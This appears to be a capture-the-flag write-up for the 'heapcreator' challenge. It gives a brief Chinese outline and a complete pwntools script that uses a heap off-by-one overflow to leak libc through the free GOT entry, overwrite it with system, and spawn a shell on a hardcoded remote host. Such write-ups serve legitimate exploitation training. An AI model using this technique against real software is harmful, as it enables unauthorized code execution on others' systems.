pwn-heapcreator(堆溢出+got表劫持)
思路:
添加0,1,2 chunk->编辑0写入/bin/sh\x00和覆盖1的size为1+2(0x81)->free1->把0x70大小的chunk申请回来->编辑1修改chunk2的索引的堆地址为free_got->show(2)泄露free_got地址->计算libc基地址->编辑2将system地址写入,就是把system地址写入free_got的fd中->调用free(0)->system("/bin/sh")->shell
from pwn import *
from LibcSearcher import *
def conn():
    """Open the target connection and load the two ELF images.

    Populates the module globals ``r`` (the pwntools tube), ``Libc``
    (the provided libc-2.23 image, used for symbol offsets) and ``elf``
    (the challenge binary, used for its GOT layout).
    """
    global r, Libc, elf
    # Local run instead of the remote service: r = process("./heapcreator")
    Libc = ELF("./libc-2.23.so")
    host, port = "1.95.36.136", 2113
    r = remote(host, port)
    elf = ELF("./heapcreator")
def add(x, y):
    """Menu option 1: request a heap chunk of *x* bytes filled with *y*.

    *y* is sent as bytes; the size is sent as its decimal text.
    """
    exchanges = (
        (b"choice :", b"1"),
        (b"Size of Heap : ", str(x).encode()),
        (b"Content of heap:", y),
    )
    for prompt, reply in exchanges:
        r.sendlineafter(prompt, reply)
def edit(x, y):
    """Menu option 2: overwrite the content of chunk index *x* with *y*."""
    exchanges = (
        (b"choice :", b"2"),
        (b"Index :", str(x).encode()),
        (b"Content of heap : ", y),
    )
    for prompt, reply in exchanges:
        r.sendlineafter(prompt, reply)
def free(x):
    """Menu option 4: release chunk index *x*."""
    index = str(x).encode()
    r.sendlineafter(b"choice :", b"4")
    r.sendlineafter(b"Index :", index)
def show(x):
    """Menu option 3: print the content of chunk index *x*."""
    index = str(x).encode()
    r.sendlineafter(b"choice :", b"3")
    r.sendlineafter(b"Index :", index)
def pwn():
    """Run the menu interaction sequence described in the header note.

    Every step depends on the heap state left by the previous one, so the
    statement order must not change. Uses the globals set by ``conn()``
    (``r``, ``Libc``, ``elf``) and the menu wrappers ``add``/``edit``/
    ``free``/``show``.
    """
    heap = 0x6020A0  # not referenced below; presumably the chunk table address -- TODO confirm
    add(0x18,b'aaa')
    add(0x10,b'aaa')
    add(0x10,b'aaa')
    # 8 + 0x10 + 1 = 0x19 bytes written into a 0x18-byte request: the last
    # byte (0x81) lands one past the requested size. Per the header note this
    # is the size field of chunk 1; a size check on the edit path would stop it.
    payload = b"/bin/sh\x00"+b'a'*0x10+b'\x81'
    edit(0,payload)
    free(1)
    # Address of free's GOT slot, read from the binary's symbol tables.
    # NOTE(review): this only matters because the GOT is writable here; a
    # Full-RELRO build maps it read-only after relocation.
    free_ = elf.got["free"]
    print("free_got>>>",hex(free_))
    # 0x70-byte request: eight zero qwords, then 0x8 and the GOT address.
    # The header note says this rewrites chunk 2's recorded pointer.
    add(0x70,p64(0)*8+p64(0x8)+p64(free_))
    show(2)
    # Read up to the first 0x7f byte, keep the last 6 bytes and zero-pad to
    # 8: assumes the printed pointer's top byte is 0x7f -- TODO confirm.
    free_addr = u64(r.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
    print("free>>>",hex(free_addr))
    # Base = leaked free address minus free's offset in the provided libc.
    libc = free_addr - Libc.sym["free"]
    sys = libc + Libc.sym["system"]  # local name shadows the stdlib module name
    # Writes 8 bytes through index 2, which per the header note now points
    # at the GOT slot resolved above.
    edit(2,p64(sys))
    free(0)
    #gdb.attach(r)
    r.interactive()
# Script entry: connect first, then run the interaction sequence.
for step in (conn, pwn):
    step()